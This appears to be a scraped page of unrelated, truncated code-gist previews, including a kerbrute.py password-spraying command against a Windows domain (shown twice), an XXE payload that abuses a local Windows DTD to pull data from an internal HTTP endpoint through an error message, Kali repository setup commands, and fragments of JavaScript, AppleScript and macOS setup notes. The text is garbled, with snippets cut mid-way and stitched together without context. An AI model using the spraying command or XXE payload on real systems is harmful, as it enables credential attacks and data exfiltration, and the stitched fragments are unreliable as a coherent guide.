With kerbrute.py:
python kerbrute.py -domain <domain_name> -users <users_file> -passwords <passwords_file> -outputfile <output_file>
With Rubeus version with brute module:
<!DOCTYPE doc [ | |
<!ENTITY % local_dtd SYSTEM "file:///C:\Windows\System32\wbem\xml\cim20.dtd"> | |
<!ENTITY % SuperClass '> | |
<!ENTITY % file SYSTEM "http://example.com:9200/_cat/indices"> | |
<!ENTITY % eval "<!ENTITY &#x25; error SYSTEM 'file://test/#%file;'>"> | |
%eval; | |
%error; | |
<!ENTITY test "test"' | |
> | |
%local_dtd; |
/** | |
* RuntimeGlobalsChecker | |
* | |
* You can use this utility to quickly check what variables have been added (or | |
* leaked) to the global window object at runtime (by JavaScript code). | |
* By running this code, the globals checker itself is attached as a singleton | |
* to the window object as "__runtimeGlobalsChecker__". | |
* You can check the runtime globals programmatically at any time by invoking | |
* "window.__runtimeGlobalsChecker__.getRuntimeGlobals()". | |
* |
(async function(){ | |
// More info on usage - dws: | |
// https://community.canvaslms.com/t5/Canvas-Developers-Group/Rubric-Analysis-Using-the-API/ba-p/270213 | |
// Basically just copy/paste this script to the Developer Tools -> Console tab on any Canvas Assignment page | |
// that has a rubic as a grading method. | |
// Original Github Gist: https://gist.github.com/acbart/0bfd1b2dbc324b345c305e362e00273c | |
// https://stackoverflow.com/questions/8735792/how-to-parse-link-header-from-github-api |
tell application "Mail" | |
set theFrom to "" | |
set theTos to {} | |
set theCcs to {} | |
set theBccs to {} | |
set theSubject to "" | |
set theContent to "" | |
set theSignature to "" |
With kerbrute.py:
python kerbrute.py -domain <domain_name> -users <users_file> -passwords <passwords_file> -outputfile <output_file>
With Rubeus version with brute module:
apt update | |
apt -y install wget gnupg dirmngr | |
wget -q -O - https://archive.kali.org/archive-key.asc | gpg --import | |
gpg --keyserver hkp://keys.gnupg.net --recv-key 44C6513A8E4FB3D30875F758ED444FF07D8D0BF6 | |
echo "deb http://http.kali.org/kali kali-rolling main non-free contrib" >> /etc/apt/sources.list | |
echo "deb http://http.kali.org/kali kali-last-snapshot main non-free contrib" >> /etc/apt/sources.list | |
gpg -a --export ED444FF07D8D0BF6 | sudo apt-key add - | |
apt update | |
apt -y upgrade | |
apt -y dist-upgrade |
This should get rid of the rvm dir and any installed rubies:
$ rvm implode
javascript: (function () { | |
var linkNode = document.createElement('link'); | |
linkNode.rel = 'stylesheet'; | |
linkNode.href = 'http://www.website.com/stylesheets/style.css'; | |
document.getElementsByTagName('head')[0].appendChild(linkNode); | |
})(); |
These instructions will guide you through the process of setting up local, trusted websites on your own computer.
These instructions are intended to be used on macOS Sierra, but they have been known to work in El Capitan, Yosemite, Mavericks, and Mountain Lion.
NOTE: You may substitute the edit
command for nano
, vim
, or whatever the editor of your choice is. Personally, I forward the edit
command to Sublime Text:
alias edit="/Applications/Sublime\ Text.app/Contents/SharedSupport/bin/subl"